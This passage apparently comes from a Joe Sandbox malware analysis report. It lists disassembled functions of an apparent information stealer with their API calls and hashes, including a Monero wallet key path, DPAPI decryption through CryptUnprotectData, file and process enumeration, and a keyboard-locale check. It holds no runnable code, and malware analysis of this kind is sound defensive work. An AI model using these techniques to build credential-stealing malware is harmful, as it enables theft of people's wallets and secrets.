                                • LocalAlloc.KERNEL32(00000040,?), ref: 00ED7BF9
                                • GetKeyboardLayoutList.USER32(?,00000000), ref: 00ED7C0D
                                • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 00ED7C62
                                • LocalFree.KERNEL32(00000000), ref: 00ED7D22
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1720444258.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                • Associated: 00000000.00000002.1720428629.0000000000EC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720444258.0000000000F71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720444258.0000000000F7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720444258.0000000000FA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720444258.000000000110A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.000000000111E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.00000000012A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.0000000001385000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.00000000013AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.00000000013B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.00000000013C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720909413.00000000013C4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1721021142.0000000001565000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1721036539.0000000001566000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
                                • String ID: /
                                • API String ID: 3090951853-4001269591
                                • Opcode ID: a8a59c76877398e3012edcc6ab5d70b4b7f343548119f1d9b64d8ea7c18de577
                                • Instruction ID: 63fd19638359c5e1f49d4fd64cd00900e60f63ab7dad96b1d451e481e2724080
                                • Opcode Fuzzy Hash: a8a59c76877398e3012edcc6ab5d70b4b7f343548119f1d9b64d8ea7c18de577
                                • Instruction Fuzzy Hash: F0412E71950218ABDB24DF94DC99BEDB3B4FF48700F2041AAE50976281DB742F86CFA1
                                Function 01296CD6 Relevance: 10.3, Strings: 7, Instructions: 1589COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1720601233.000000000111E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                • Associated: 00000000.00000002.1720428629.0000000000EC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720444258.0000000000EC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720444258.0000000000F71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720444258.0000000000F7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720444258.0000000000FA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720444258.000000000110A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.00000000012A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.0000000001385000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.00000000013AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.00000000013B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.00000000013C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720909413.00000000013C4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1721021142.0000000001565000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1721036539.0000000001566000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: !.$$;a$+YO/$3??]$>wj$Sts/$G{V
                                • API String ID: 0-177615432
                                • Opcode ID: de6a8a55d17da28b335cf80a91d6e230b6574116ae52334d56628f7172b28ece
                                • Instruction ID: 47d88c6e03bacfc54ea960da933b7f63fd46ef80002f0e17cfb01f00f022d81c
                                • Opcode Fuzzy Hash: de6a8a55d17da28b335cf80a91d6e230b6574116ae52334d56628f7172b28ece
                                • Instruction Fuzzy Hash: BBB2E3F3A0C200AFE704AE29EC8577ABBE5EF94320F16492DE6C5C7744E63598458787
                                Function 00ECE430 Relevance: 9.3, APIs: 4, Strings: 1, Instructions: 514fileCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00EDA740: lstrcpy.KERNEL32(00EE0E17,00000000), ref: 00EDA788
                                  • Part of subcall function 00EDA920: lstrcpy.KERNEL32(00000000,?), ref: 00EDA972
                                  • Part of subcall function 00EDA920: lstrcat.KERNEL32(00000000), ref: 00EDA982
                                  • Part of subcall function 00EDA9B0: lstrlen.KERNEL32(?,00DA9038,?,\Monero\wallet.keys,00EE0E17), ref: 00EDA9C5
                                  • Part of subcall function 00EDA9B0: lstrcpy.KERNEL32(00000000), ref: 00EDAA04
                                  • Part of subcall function 00EDA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00EDAA12
                                  • Part of subcall function 00EDA8A0: lstrcpy.KERNEL32(?,00EE0E17), ref: 00EDA905
                                • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,\*.*,00EE0D73), ref: 00ECE4A2
                                • StrCmpCA.SHLWAPI(?,00EE14F8), ref: 00ECE4F2
                                • StrCmpCA.SHLWAPI(?,00EE14FC), ref: 00ECE508
                                • FindNextFileA.KERNEL32(000000FF,?), ref: 00ECEBDF
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1720444258.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                • Associated: 00000000.00000002.1720428629.0000000000EC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720444258.0000000000F71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720444258.0000000000F7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720444258.0000000000FA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720444258.000000000110A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.000000000111E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.00000000012A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.0000000001385000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.00000000013AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.00000000013B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.00000000013C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720909413.00000000013C4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1721021142.0000000001565000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1721036539.0000000001566000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$FileFindlstrcat$FirstNextlstrlen
                                • String ID: \*.*
                                • API String ID: 433455689-1173974218
                                • Opcode ID: 45990e5f19ce55076f8068303ce489b2f0bc9335365594dbd00cc765b3b0c29d
                                • Instruction ID: dba77624b744bbdaaf1efabc4c6b18dc796cdb627c57e01fda9aa189b837d5b5
                                • Opcode Fuzzy Hash: 45990e5f19ce55076f8068303ce489b2f0bc9335365594dbd00cc765b3b0c29d
                                • Instruction Fuzzy Hash: 621255369001189ADB18FB60DD96EED73B9EF54300F4451BAB50A72281EF705F8ACF92
                                Function 00EC9AC0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 55encryptionmemoryCOMMON
                                Download Yara Rule
                                APIs
                                • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N,00000000,00000000), ref: 00EC9AEF
                                • LocalAlloc.KERNEL32(00000040,?,?,?,00EC4EEE,00000000,?), ref: 00EC9B01
                                • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N,00000000,00000000), ref: 00EC9B2A
                                • LocalFree.KERNEL32(?,?,?,?,00EC4EEE,00000000,?), ref: 00EC9B3F
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1720444258.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                • Associated: 00000000.00000002.1720428629.0000000000EC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720444258.0000000000F71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720444258.0000000000F7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720444258.0000000000FA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720444258.000000000110A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.000000000111E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.00000000012A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.0000000001385000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.00000000013AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.00000000013B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.00000000013C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720909413.00000000013C4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1721021142.0000000001565000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1721036539.0000000001566000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: BinaryCryptLocalString$AllocFree
                                • String ID: N
                                • API String ID: 4291131564-1689755984
                                • Opcode ID: 4b547632dceef005607afca3b60e862e6ed490dbd0e8a9315f5e9708976c6198
                                • Instruction ID: 8a999b67e7651f12990c47b793cca18c929188265184b3f9580bb90a78a96a87
                                • Opcode Fuzzy Hash: 4b547632dceef005607afca3b60e862e6ed490dbd0e8a9315f5e9708976c6198
                                • Instruction Fuzzy Hash: 6611D2B4640308BFEB14CF64D895FAA77B5FB89705F208059FD15AB384C7B2AA41CB90
                                Function 0129A9D9 Relevance: 8.6, Strings: 6, Instructions: 1093COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1720601233.000000000111E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                • Associated: 00000000.00000002.1720428629.0000000000EC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720444258.0000000000EC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720444258.0000000000F71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720444258.0000000000F7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720444258.0000000000FA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720444258.000000000110A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.00000000012A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.0000000001385000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.00000000013AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.00000000013B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.00000000013C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720909413.00000000013C4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1721021142.0000000001565000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1721036539.0000000001566000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: #|n^$<n;>$?O^}$Rzk$`%s$q7_
                                • API String ID: 0-325737757
                                • Opcode ID: f415fc6f252e81b14d66cd9630ef8c9e8faf4021eba239597614e9393aef6397
                                • Instruction ID: 95fae0f4011cfcaeaa581dc6dc7a62d2b0b89d7e3fa1a0cd42785897010285fe
                                • Opcode Fuzzy Hash: f415fc6f252e81b14d66cd9630ef8c9e8faf4021eba239597614e9393aef6397
                                • Instruction Fuzzy Hash: 607218F390C304AFE3046E29EC8567ABBE9EF94320F16853DEAC497744E63598058797
                                Function 0128B05F Relevance: 7.8, Strings: 5, Instructions: 1580COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1720601233.000000000111E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                • Associated: 00000000.00000002.1720428629.0000000000EC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720444258.0000000000EC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720444258.0000000000F71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720444258.0000000000F7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720444258.0000000000FA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720444258.000000000110A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.00000000012A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.0000000001385000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.00000000013AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.00000000013B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.00000000013C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720909413.00000000013C4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1721021142.0000000001565000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1721036539.0000000001566000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: "CnY$&g_$H|$m}?$td9H
                                • API String ID: 0-3843161316
                                • Opcode ID: 96af8e919521b7fcc496b594809d9992fe74300d1437b5bc7da45013c49cdbeb
                                • Instruction ID: 69d92ed065f52694f7bfd4063c799b65e591d724804f10a15641aa8d93087f81
                                • Opcode Fuzzy Hash: 96af8e919521b7fcc496b594809d9992fe74300d1437b5bc7da45013c49cdbeb
                                • Instruction Fuzzy Hash: 65B2E1B390C314AFE304AE6DEC8566AFBE9EF94720F16493DEAC483740E63558058797
                                Function 00ECC820 Relevance: 7.6, APIs: 5, Instructions: 95stringencryptionCOMMON
                                Download Yara Rule
                                APIs
                                • lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 00ECC871
                                • CryptStringToBinaryA.CRYPT32(?,00000000), ref: 00ECC87C
                                • lstrcat.KERNEL32(?,00EE0B46), ref: 00ECC943
                                • lstrcat.KERNEL32(?,00EE0B47), ref: 00ECC957
                                • lstrcat.KERNEL32(?,00EE0B4E), ref: 00ECC978
                                Memory Dump Source
                                • Source File: 00000000.00000002.1720444258.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                • Associated: 00000000.00000002.1720428629.0000000000EC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720444258.0000000000F71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720444258.0000000000F7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720444258.0000000000FA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720444258.000000000110A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.000000000111E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.00000000012A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.0000000001385000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.00000000013AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.00000000013B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.00000000013C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720909413.00000000013C4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1721021142.0000000001565000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1721036539.0000000001566000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcat$BinaryCryptStringlstrlen
                                • String ID:
                                • API String ID: 189259977-0
                                • Opcode ID: b2b0976b7f18afe64924c8f3875a742aa0a655c619eb730dc66eb7cf65ca4a8c
                                • Instruction ID: d6360956a96970d0040c9ef3647de680239bbfa5a57e8318cfb25768b7b27e56
                                • Opcode Fuzzy Hash: b2b0976b7f18afe64924c8f3875a742aa0a655c619eb730dc66eb7cf65ca4a8c
                                • Instruction Fuzzy Hash: C8416D75D0431A9BDB14CFA4DD89BEEB7B8BF88304F1041A8E509B7280D7B55A85CF91
                                Function 00EC7240 Relevance: 7.5, APIs: 5, Instructions: 48memoryencryptionCOMMON
                                Download Yara Rule
                                APIs
                                • GetProcessHeap.KERNEL32(00000008,00000400), ref: 00EC724D
                                • RtlAllocateHeap.NTDLL(00000000), ref: 00EC7254
                                • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 00EC7281
                                • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,00000400,00000000,00000000), ref: 00EC72A4
                                • LocalFree.KERNEL32(?), ref: 00EC72AE
                                Memory Dump Source
                                • Source File: 00000000.00000002.1720444258.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                • Associated: 00000000.00000002.1720428629.0000000000EC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720444258.0000000000F71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720444258.0000000000F7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720444258.0000000000FA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720444258.000000000110A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.000000000111E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.00000000012A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.0000000001385000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.00000000013AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.00000000013B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.00000000013C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720909413.00000000013C4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1721021142.0000000001565000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1721036539.0000000001566000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateByteCharCryptDataFreeLocalMultiProcessUnprotectWide
                                • String ID:
                                • API String ID: 2609814428-0
                                • Opcode ID: 104becde33b92ff46bd2e1461157b073acdbacd70b8c1ae0d509d0939cf30a8d
                                • Instruction ID: a870b2fb9d94344a8bd4ad763b55ba33c0fd08eeac32382db6215b60140e6f13
                                • Opcode Fuzzy Hash: 104becde33b92ff46bd2e1461157b073acdbacd70b8c1ae0d509d0939cf30a8d
                                • Instruction Fuzzy Hash: 6F0140B5A40308BBEB24DBD4DD46F9D7778AB44701F104059FB15BB2C4D6B0AA418B64
                                Function 00ED9600 Relevance: 7.5, APIs: 5, Instructions: 42processCOMMON
                                Download Yara Rule
                                APIs
                                • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00ED961E
                                • Process32First.KERNEL32(00EE0ACA,00000128), ref: 00ED9632
                                • Process32Next.KERNEL32(00EE0ACA,00000128), ref: 00ED9647
                                • StrCmpCA.SHLWAPI(?,00000000), ref: 00ED965C
                                • CloseHandle.KERNEL32(00EE0ACA), ref: 00ED967A
                                Memory Dump Source
                                • Source File: 00000000.00000002.1720444258.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                • Associated: 00000000.00000002.1720428629.0000000000EC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720444258.0000000000F71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720444258.0000000000F7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720444258.0000000000FA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720444258.000000000110A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.000000000111E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.00000000012A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.0000000001385000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.00000000013AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.00000000013B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.00000000013C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720909413.00000000013C4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1721021142.0000000001565000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1721036539.0000000001566000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                • String ID:
                                • API String ID: 420147892-0
                                • Opcode ID: dd9e875c120224952a632970a2c2371159a89ddbdb523324f242c46eab7f1d87
                                • Instruction ID: a187859cef779ce4215b34ed10d8234d30f617a9450f7a61e81fc4c01ad030d7
                                • Opcode Fuzzy Hash: dd9e875c120224952a632970a2c2371159a89ddbdb523324f242c46eab7f1d87
                                • Instruction Fuzzy Hash: F9012975A00208ABCB25DFA4D848BEDB7F8EF08301F004199A916A7240DB749B81CF50
                                Function 01295A65 Relevance: 7.2, Strings: 5, Instructions: 906COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1720601233.000000000111E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                • Associated: 00000000.00000002.1720428629.0000000000EC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720444258.0000000000EC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720444258.0000000000F71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720444258.0000000000F7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720444258.0000000000FA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720444258.000000000110A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.00000000012A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.0000000001385000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.00000000013AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.00000000013B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.00000000013C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720909413.00000000013C4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1721021142.0000000001565000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1721036539.0000000001566000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: %.sH$@P;~$P<N.$wo?$eu_
                                • API String ID: 0-4011363835
                                • Opcode ID: 05f89f7c92b9ce26fb30c4f8787c46fb5a69f5d776b299b5418b63269cf567e2
                                • Instruction ID: 59c1723ba8185ac0e6a9ca42424a2ace71bc0b28b67f828298be13aa62ac25eb
                                • Opcode Fuzzy Hash: 05f89f7c92b9ce26fb30c4f8787c46fb5a69f5d776b299b5418b63269cf567e2
                                • Instruction Fuzzy Hash: 0152E6F360C2009FE704AE2DEC9577ABBE9EF94320F16493DE6C5C7744EA3598058686
                                Function 0128955C Relevance: 6.6, Strings: 4, Instructions: 1578COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1720601233.000000000111E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                • Associated: 00000000.00000002.1720428629.0000000000EC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720444258.0000000000EC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720444258.0000000000F71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720444258.0000000000F7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720444258.0000000000FA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720444258.000000000110A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.00000000012A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.0000000001385000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.00000000013AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.00000000013B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720601233.00000000013C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1720909413.00000000013C4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1721021142.0000000001565000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1721036539.0000000001566000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: 0L_$\u=$wW~$zw7
                                • API String ID: 0-3420334709
